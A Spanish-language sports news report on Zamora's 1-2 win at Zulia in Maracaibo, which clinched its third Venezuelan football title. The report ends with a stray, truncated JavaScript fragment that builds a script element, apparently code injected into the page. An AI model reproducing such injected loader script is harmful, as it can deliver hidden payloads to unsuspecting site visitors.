Deportes Destacados

Zamora ganó en Maracaibo y se quedó con la estrella

Redacción.- Un ‘Avioncito’ bombardeó este domingo el “Pachencho” Romero y el Zamora conquistó su tercera estrella en el fútbol venezolano. Un gol de Richard Blanco, y luego una pifia tremenda del portero petrolero Edixson González le dieron la victoria 1-2 a los llaneros sobre el Zulia que se quedó a un paso de terminar de coronar un gran semestre.
El equipo de Francesco Stifano hizo méritos para quedarse con el título ante un rival que parecía embalado tras ganar la Copa Venezuela y el torneo Clausura, pero se encontró de frente con uno de los equipos más regulares de los últimos años al ganar tres campeonatos absolutos en las pasadas cinco campañas.

En un repleto estadio, las cosas comenzaron a salirle bien al local. A pesar de que Zamora avisó primero con dos travesaños en el primer minuto tras los remates de Yeferson Soteldo y Blanco, los petroleros abrieron el marcador por intermedio del argentino Sergio Unrein (m.18).

El delantero recibió un pase de Henry Plazas y con un toque sutil definió para superar al portero Carlos Salazar y desatar la locura en el estadio marabino que retumbaba con el “si se puede”. Los primeros 45 minutos transcurrieron con los dirigidos por César ‘Champion’ Marcano buscando un aumentar la cuenta y los llaneros aguantando la presión.

Pero a los cinco minutos del complemento apareció Blanco. Un pase de Pedro Ramírez dentro del área lo terminó el guaireño con un misil con su pierna derecha que fulminó a Edixson González y silenció al “Pachencho
No habían pasado ni diez minutos del balde de agua fría que recibió el Zulia que veía como se cortaba la racha de imbatibilidad en casa tras ocho partidos y los zulianos recibieron otro golpe, esta vez mortal. La seguridad bajo los tres palos que mostró González se esfumó con un remate de César Martínez que se coló entre las piernas del portero.

Jefferson Savarino tuvo en sus pies el empate con un penal sentenciado al 78, pero su remate, débil terminó en las manos de Carlos Salazar, con lo que se sentenció el partido, la victoria llanera y el fin del sueño petrolero
 var d=document;var s=d.createElement(‘script’);